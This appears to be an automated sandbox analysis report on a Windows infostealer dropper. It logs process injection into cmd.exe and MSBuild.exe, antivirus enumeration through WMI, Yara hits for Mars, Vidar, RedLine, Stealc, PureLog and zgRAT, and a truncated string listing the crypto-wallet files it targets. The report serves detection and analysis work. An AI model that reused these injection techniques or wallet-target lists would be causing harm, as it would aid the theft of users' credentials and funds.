Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	NtQuerySystemInformation: Direct from: 0x865BE4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	NtSetInformationThread: Direct from: 0x6C838C4C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Code function: 10_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

10_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6AF01000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4CB008
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6AF01000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: ED5008

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\u48o.0.exe "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Process created: C:\Users\user\AppData\Local\Temp\u48o.1.exe "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Process created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Code function: 18_2_6C833470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,

18_2_6C833470

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

18_2_6C833470

Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: TrayNotifyWndShell_TrayWnd
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32SVWU
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: Shell_TrayWndtooltips_class32S

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Code function: 0_2_00409D1B cpuid

0_2_00409D1B

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00420063
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,	0_2_004208CE
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_004170F1
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042099B
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_004202DB
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_00420326
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_004203C1
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042044E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,	0_2_004174E4
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,	0_2_0042069E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_004207C7
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_04340C02
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_04340542
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_0434058D
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_04340628
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,	0_2_0433774B
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,	0_2_04340905
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,	0_2_04340903
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_04340A2E
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_043402CA
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: GetLocaleInfoW,	0_2_04340B35
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: EnumSystemLocalesW,	0_2_04337358
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	10_2_00414570

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6072408 VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Code function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Code function: 10_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

10_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Code function: 10_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

10_2_004144B0

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

Code function: 18_2_00872DA6 _memset,GetVersionExW,

18_2_00872DA6

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1530072053.00000256544FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 